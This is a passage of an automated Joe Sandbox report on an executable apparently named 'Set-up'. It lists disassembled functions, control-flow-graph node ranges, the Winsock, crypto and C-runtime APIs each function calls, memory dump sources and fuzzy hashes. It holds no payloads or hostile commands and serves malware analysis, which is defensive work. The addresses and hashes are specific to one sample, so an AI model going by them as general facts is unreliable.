                                control_flow_graph 896 1daa30-1daa64 898 1daa6a-1daaa7 call 1ce730 896->898 899 1dab04-1dab09 896->899 903 1dab0e-1dab13 898->903 904 1daaa9-1daabd 898->904 901 1dae80-1dae89 899->901 907 1dae2e 903->907 905 1daabf-1daac7 904->905 906 1dab18-1dab50 htons 904->906 905->907 908 1daacd-1dab02 htons 905->908 909 1dab58-1dab6d 906->909 910 1dae30-1dae4a call 1cea60 call 1cebf0 907->910 908->909 911 1dab6f-1dab73 909->911 912 1dab96-1dabab socket 909->912 925 1dae4c-1dae57 910->925 926 1dae75-1dae7d 910->926 911->912 915 1dab75-1dab8f 911->915 912->907 914 1dabb1-1dabc5 912->914 918 1dabc7-1dabca 914->918 919 1dabd0-1dabed ioctlsocket 914->919 915->914 932 1dab91 915->932 918->919 921 1dad2e-1dad39 918->921 922 1dabef-1dac0a setsockopt 919->922 923 1dac10-1dac14 919->923 927 1dad3b-1dad4c 921->927 928 1dad52-1dad56 921->928 922->923 929 1dae29 922->929 930 1dac37-1dac41 923->930 931 1dac16-1dac31 setsockopt 923->931 933 1dae6e-1dae6f closesocket 925->933 934 1dae59-1dae5e 925->934 926->901 927->928 927->929 928->929 935 1dad5c-1dad6b 928->935 929->907 936 1dac7a-1dac7e 930->936 937 1dac43-1dac46 930->937 931->929 931->930 932->907 933->926 934->933 938 1dae60-1dae6c 934->938 940 1dad70-1dad78 935->940 944 1dace7-1dacfe setsockopt 936->944 945 1dac80-1dac9b 936->945 941 1dac4c-1dac51 937->941 942 1dad04-1dad08 937->942 938->926 947 1dad7a-1dad7f 940->947 948 1dada0-1dadad connect 940->948 941->942 949 1dac57-1dac78 htonl 941->949 942->921 946 1dad0a-1dad28 setsockopt 942->946 944->942 945->944 950 1dac9d-1dacc1 945->950 946->921 946->929 947->948 952 1dad81-1dad99 947->952 954 1dadb3-1dadcf WSAGetLastError 948->954 953 1dacc6-1dacd7 bind 949->953 950->953 952->954 953->929 955 1dacdd-1dace5 953->955 956 1dae8a-1dae91 954->956 957 1dadd5-1dadd8 954->957 955->942 955->944 956->910 958 1dadda-1daddf 957->958 959 1dade1-1dadf1 957->959 958->940 958->959 961 1dae0d-1dae12 959->961 962 1dadf3-1dae07 959->962 963 1dae1a-1dae1c call 1daf70 961->963 964 1dae14-1dae17 961->964 962->961 967 1daea8-1daead 962->967 968 1dae21-1dae23 963->968 964->963 967->910 969 1dae25-1dae27 968->969 970 1dae93-1dae9d 968->970 969->910 971 1daeaf-1daeb1 call 1ce760 970->971 972 1dae9f-1daea6 call 1ce7c0 970->972 976 1daeb6-1daebe 971->976 972->976 977 1daf1a-1daf1f 976->977 978 1daec0-1daedb call 1ce180 976->978 977->910 978->910 981 1daee1-1daeec 978->981 982 1daeee-1daeff 981->982 983 1daf02-1daf06 981->983 982->983 984 1daf0e-1daf15 983->984 985 1daf08-1daf0b 983->985 984->901 985->984
                                APIs
                                • htons.WS2_32(?), ref: 001DAAE8
                                • htons.WS2_32(?), ref: 001DAB33
                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 001DAB9A
                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 001DABE3
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 001DAC02
                                • setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 001DAC29
                                • htonl.WS2_32(00000000), ref: 001DAC69
                                • bind.WS2_32(?,00000017,0000001C), ref: 001DACCF
                                • setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 001DACFE
                                • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 001DAD20
                                • WSAGetLastError.WS2_32 ref: 001DADB5
                                • closesocket.WS2_32(?), ref: 001DAE6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
                                • String ID: xc
                                • API String ID: 4039825230-3394131015
                                • Opcode ID: f4bcb7a7a769916bcfb78a514290840c03dbafa83d1635a2c4bce307e84d0625
                                • Instruction ID: 3ff9b0120c4d5c5bc426a0e93e131ae7ae67403293c3cc488bddf680d990b15b
                                • Opcode Fuzzy Hash: f4bcb7a7a769916bcfb78a514290840c03dbafa83d1635a2c4bce307e84d0625
                                • Instruction Fuzzy Hash: F5E18C706003019FEB20CF64C885B6AB7E5FF89314F548A2EF9998B391D775E944CB92
                                Function 0011116C Relevance: 19.7, APIs: 13, Instructions: 200sleepstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1021 11116c-11118a 1022 111430-111439 GetStartupInfoA 1021->1022 1023 111190-1111a1 1021->1023 1025 111448-11145d _cexit 1022->1025 1024 1111bc-1111c8 1023->1024 1026 1111a8-1111aa 1024->1026 1027 1111ca-1111d4 1024->1027 1028 1113d0-1113dd 1026->1028 1029 1111b0-1111b9 Sleep 1026->1029 1030 1113e3-1113f7 call 498a20 1027->1030 1031 1111da-1111e1 1027->1031 1028->1030 1028->1031 1029->1024 1035 1113fd-11141d _initterm 1030->1035 1036 1111ff-111201 1030->1036 1033 111460-111479 _initterm 1031->1033 1034 1111e7-1111f9 1031->1034 1040 111483 1033->1040 1034->1035 1034->1036 1038 111423-111429 1035->1038 1039 111207-11120e 1035->1039 1036->1038 1036->1039 1038->1039 1041 111210-111229 1039->1041 1042 11122c-11126c call 4993e0 SetUnhandledExceptionFilter _set_invalid_parameter_handler call 499210 __p__acmdln 1039->1042 1044 11148a-111499 exit 1040->1044 1041->1042 1049 111281-111287 1042->1049 1050 11126e 1042->1050 1052 111270-111272 1049->1052 1053 111289-111294 1049->1053 1051 1112bd-1112c5 1050->1051 1056 1112c7-1112d0 1051->1056 1057 1112db-1112fa malloc 1051->1057 1054 111274-111277 1052->1054 1055 1112b8 1052->1055 1058 11127e 1053->1058 1059 1112a0-1112a2 1054->1059 1060 111279 1054->1060 1055->1051 1061 1113c0-1113c4 1056->1061 1062 1112d6 1056->1062 1057->1040 1063 111300-111311 1057->1063 1058->1049 1059->1055 1065 1112a4 1059->1065 1060->1058 1061->1062 1062->1057 1064 111318-11134c strlen malloc memcpy 1063->1064 1064->1064 1066 11134e-11139b call 499060 call 639480 1064->1066 1067 1112a8-1112b1 1065->1067 1066->1044 1073 1113a1-1113a9 1066->1073 1067->1055 1068 1112b3-1112b6 1067->1068 1068->1055 1068->1067 1073->1025 1074 1113af-1113ba 1073->1074
                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • GetStartupInfoA.KERNEL32 ref: 00111433
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 3873122205-0
                                • Opcode ID: 865d4c6faaa7032333a3aa774f05668fb454bacba1dfd548038345e06fa2814c
                                • Instruction ID: cf85b504e050a13b4ac5abb9beafe130770f087e725294097fac90361bce2fee
                                • Opcode Fuzzy Hash: 865d4c6faaa7032333a3aa774f05668fb454bacba1dfd548038345e06fa2814c
                                • Instruction Fuzzy Hash: DD81AC71A04304DFDB18DFA9E9813AEFBE0FB95304F11493DDA859B251E775A884CB82
                                Function 00498E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1182 498e90-498eb8 _open 1183 498eba-498ec7 1182->1183 1184 498eff-498f2c call 499f70 1182->1184 1185 498ec9 1183->1185 1186 498ef3-498efa _exit 1183->1186 1193 498f39-498f51 _write 1184->1193 1188 498ecb-498ecd 1185->1188 1189 498ee2-498ef1 1185->1189 1186->1184 1191 63b5a0-63b5b7 1188->1191 1192 498ed3-498ed6 1188->1192 1189->1185 1189->1186 1194 63b5ba-63b5ef CryptAcquireContextA 1191->1194 1195 63b5b9 1191->1195 1192->1189 1196 498ed8 1192->1196 1197 498f30-498f37 1193->1197 1198 498f53-498f5e _close 1193->1198 1199 63b5f1-63b5ff 1194->1199 1200 63b609-63b62b CryptGenRandom 1194->1200 1196->1189 1197->1193 1197->1198 1198->1183 1201 63b605-63b608 1199->1201 1202 63b636-63b64b CryptReleaseContext 1200->1202 1203 63b62d-63b634 1200->1203 1202->1199 1203->1202 1204 63b64d-63b662 CryptReleaseContext 1203->1204 1204->1201
                                APIs
                                • _open.MSVCRT ref: 00498EAD
                                • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00498EFA
                                • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00498F4A
                                • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00498F59
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _close_exit_open_write
                                • String ID: terminated$@$CONOUT$
                                • API String ID: 28676597-491099378
                                • Opcode ID: 724e1bda4e12c7339c22535c37228dd41d09525da927d1749e7ae0ae0055068b
                                • Instruction ID: 7f268042a5c33c96cc2992ac1159d1bcd15090cb02d29eee8312b32671ddb856
                                • Opcode Fuzzy Hash: 724e1bda4e12c7339c22535c37228dd41d09525da927d1749e7ae0ae0055068b
                                • Instruction Fuzzy Hash: 38412AB09042058FCB00DF79D94566EBBE5FB99314F008A2EE998D7391E738D845CB56
                                Function 00631870 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                • error CryptGenRandom 0x%08lx, xrefs: 006319E9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: error CryptGenRandom 0x%08lx
                                • API String ID: 0-1222942552
                                • Opcode ID: 3776a68ac30b68eb85caf028b603b613e8f079d5a89ddcb1f3f886cf6a900507
                                • Instruction ID: 749c8c319ad250074aa702bc5f4fc7fcd489f4aa631279358c548249ad0e7edd
                                • Opcode Fuzzy Hash: 3776a68ac30b68eb85caf028b603b613e8f079d5a89ddcb1f3f886cf6a900507
                                • Instruction Fuzzy Hash: E141C1B59093009FC700EF79D58961EBFE0BB99314F409E2EE98887354E7789548CF86
                                Function 001205B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1226 1205b0-1205b7 1227 1207ee 1226->1227 1228 1205bd-1205d4 1226->1228 1229 1207e7-1207ed 1228->1229 1230 1205da-1205e6 1228->1230 1229->1227 1230->1229 1231 1205ec-1205f0 1230->1231 1232 1205f6-120620 call 127350 call 1170b0 1231->1232 1233 1207c7-1207cc 1231->1233 1238 120622-120624 1232->1238 1239 12066a-12068c call 14dec0 1232->1239 1233->1229 1241 120630-120655 call 1170d0 call 1203c0 call 127450 1238->1241 1245 120692-1206a0 1239->1245 1246 1207d6-1207e3 call 127380 1239->1246 1266 12065b-120668 call 1170e0 1241->1266 1267 1207ce 1241->1267 1249 1206a2-1206a4 1245->1249 1250 1206f4-1206f6 1245->1250 1246->1229 1255 1206b0-1206e4 call 1273b0 1249->1255 1252 1207ef-12082b call 123000 1250->1252 1253 1206fc-1206fe 1250->1253 1270 120831-120837 1252->1270 1271 120a2f-120a35 1252->1271 1257 12072c-120754 1253->1257 1255->1246 1265 1206ea-1206ee 1255->1265 1262 120756-12075b 1257->1262 1263 12075f-12078b getsockopt 1257->1263 1268 120707-120719 WSAEventSelect 1262->1268 1269 12075d 1262->1269 1272 120700-120703 1263->1272 1273 120791-120796 1263->1273 1265->1255 1274 1206f0 1265->1274 1266->1239 1266->1241 1267->1246 1268->1246 1276 12071f 1268->1276 1279 120723-120726 1269->1279 1280 120861-12087e WSAWaitForMultipleEvents 1270->1280 1281 120839-12084c call 126fa0 1270->1281 1277 120a37-120a3a 1271->1277 1278 120a3c-120a52 1271->1278 1272->1268 1273->1272 1282 12079c-1207c2 call 1176a0 1273->1282 1274->1250 1276->1279 1277->1278 1278->1246 1285 120a58-120a81 call 122f10 1278->1285 1279->1252 1279->1257 1283 120882-12088d 1280->1283 1297 120852 1281->1297 1298 120a9c-120aa4 1281->1298 1282->1272 1289 120893-1208b1 1283->1289 1290 120970-120975 1283->1290 1285->1246 1299 120a87-120a97 call 126df0 1285->1299 1293 1208c8-1208f7 WSAEnumNetworkEvents 1289->1293 1294 12097b-120989 call 1170b0 1290->1294 1295 120a19-120a2c WSAResetEvent 1290->1295 1301 1208f9-1208fb 1293->1301 1302 1208fd-120925 1293->1302 1294->1295 1310 12098f-12099e 1294->1310 1295->1271 1297->1280 1300 120854-12085f 1297->1300 1298->1246 1299->1246 1300->1283 1305 120928-12093f WSAEventSelect 1301->1305 1302->1305 1308 1208b3-1208c2 1305->1308 1309 120945-12096b 1305->1309 1308->1290 1308->1293 1309->1308 1311 1209b0-1209c1 call 1170d0 1310->1311 1314 1209c3-1209c7 1311->1314 1315 1209a0-1209ae call 1170e0 1311->1315 1317 1209e8-120a03 WSAEnumNetworkEvents 1314->1317 1315->1295 1315->1311 1319 1209d0-1209e6 WSAEventSelect 1317->1319 1320 120a05-120a17 1317->1320 1319->1315 1319->1317 1320->1319
                                APIs
                                • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00120711
                                • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00120783
                                • WSAWaitForMultipleEvents.WS2_32(00000001,00113EBE,00000000,00000000,00000000), ref: 0012086F
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001208EF
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00120934
                                • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 001209DC
                                • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 001209FB
                                • WSAResetEvent.WS2_32(8508C483), ref: 00120A1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                                • String ID: multi.c
                                • API String ID: 3264668090-214371023
                                • Opcode ID: c4a27ee146f77e481594471f1661de2f31f933f1ef6660a4014e861f92e3bed5
                                • Instruction ID: 73e49d3e08d940a2209ab929147ac6ce80da55b796efec15e312668ea040a2e5
                                • Opcode Fuzzy Hash: c4a27ee146f77e481594471f1661de2f31f933f1ef6660a4014e861f92e3bed5
                                • Instruction Fuzzy Hash: 58D1C2756083019FEB12CF64E881BAB77E5FF98348F044A2CF98587252E774E964CB52
                                Function 00126FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: e0f12921f182211ca395403b1fca3bfd7fed9e53789522e958dedd563b35ac9a
                                • Instruction ID: 836c854fd14a4e6b655b9b6181d341bdf9ac653adb0a3df6c976f6ab5b274fa1
                                • Opcode Fuzzy Hash: e0f12921f182211ca395403b1fca3bfd7fed9e53789522e958dedd563b35ac9a
                                • Instruction Fuzzy Hash: 5991253060C3298BD7358B69E8947BBB2E5FFC5324F148B2CE899831D4EB749C60D681
                                Function 001111A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32 ref: 001111B7
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011140C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                • String ID:
                                • API String ID: 1209083157-0
                                • Opcode ID: fbd6c2fc7c26e32e642bbea6a85009227066b130a7e708fb5c375db96abe4a0d
                                • Instruction ID: 12da2456aae143a9d46641d45126afdf607daf26385d433b9ab0ccc3f61ab541
                                • Opcode Fuzzy Hash: fbd6c2fc7c26e32e642bbea6a85009227066b130a7e708fb5c375db96abe4a0d
                                • Instruction Fuzzy Hash: F2416BB0A04741DFDB18EFA9E99439DBBF0BB99344F10493DE944A7350DB749884CB92
                                Function 001113C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON
                                Download Yara Rule
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00111238
                                • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011124D
                                • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00111261
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001112EB
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00111323
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0011132E
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00111344
                                  • Part of subcall function 00498A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,001113EF), ref: 00498A2A
                                • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011140C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
